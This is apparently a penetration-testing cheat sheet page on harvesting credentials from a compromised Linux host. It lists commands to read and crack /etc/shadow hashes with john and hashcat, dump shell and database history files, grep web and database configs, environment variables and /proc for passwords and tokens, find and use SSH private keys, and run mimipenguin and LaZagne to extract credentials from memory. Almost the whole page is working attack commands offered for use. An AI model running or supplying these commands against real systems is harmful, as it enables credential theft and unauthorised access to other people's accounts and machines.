Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

/etc/shadow

Check Readable

ls -la /etc/shadow
cat /etc/shadow 2>/dev/null

Crack Hashes

# Copy shadow and passwd to attacker
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

hashcat -m 1800 shadow.hash /usr/share/wordlists/rockyou.txt
Hash PrefixAlgorithmHashcat Mode
$1$MD5500
$5$SHA-2567400
$6$SHA-5121800
$y$yescrypt28400

History Files

cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.psql_history

All Users

find /home -name ".*history" -exec cat {} \; 2>/dev/null
cat /root/.bash_history 2>/dev/null

Search for Passwords in History

grep -i "password\|pass\|pwd\|secret\|token" ~/.bash_history

Config Files

Web Applications

cat /var/www/html/wp-config.php
cat /var/www/html/.env
cat /var/www/html/config.php
cat /var/www/html/configuration.php
find /var/www -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.env" 2>/dev/null

Database Configs

cat /etc/mysql/my.cnf
cat /etc/postgresql/*/main/pg_hba.conf
cat /etc/mongod.conf

Common Config Locations

find /etc -name "*.conf" -exec grep -li "password\|pass\|pwd" {} \; 2>/dev/null
find /opt -name "*.conf" -o -name "*.config" -o -name "*.yml" -o -name "*.yaml" 2>/dev/null

SSH Keys

Find Private Keys

find / -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" 2>/dev/null
ls -la /home/*/.ssh/
ls -la /root/.ssh/ 2>/dev/null

Use Found Key

chmod 600 id_rsa
ssh -i id_rsa user@TARGET

Authorized Keys (Persistence)

cat /home/*/.ssh/authorized_keys 2>/dev/null

Environment Variables

env
printenv
cat /proc/*/environ 2>/dev/null | tr '\0' '\n' | grep -i "pass\|key\|secret\|token"

Systemd Service Env Files

find /etc/systemd -name "*.service" -exec grep -l "Environment" {} \;

Wildcard Search for Passwords

grep -rli "password" /etc/ 2>/dev/null
grep -rli "password" /var/ 2>/dev/null
grep -rli "password" /opt/ 2>/dev/null
grep -rli "password" /home/ 2>/dev/null

Files Containing “pass”

find / -type f \( -name "*.txt" -o -name "*.conf" -o -name "*.cfg" -o -name "*.xml" -o -name "*.ini" -o -name "*.env" -o -name "*.yml" \) -exec grep -li "pass" {} \; 2>/dev/null

Credentials in Memory

/proc

strings /proc/*/maps 2>/dev/null | grep -i "pass"

mimipenguin

https://github.com/huntergregal/mimipenguin

sudo python3 mimipenguin.py
sudo bash mimipenguin.sh

LaZagne

https://github.com/AlessandroZ/LaZagne

python3 laZagne.py all

Backup Files

find / -name "*.bak" -o -name "*.old" -o -name "*.backup" -o -name "*~" 2>/dev/null | grep -v proc

Databases

SQLite

find / -name "*.db" -o -name "*.sqlite" -o -name "*.sqlite3" 2>/dev/null
sqlite3 found.db ".tables"
sqlite3 found.db "SELECT * FROM users;"

MySQL (If Accessible)

mysql -u root -p
mysql -u root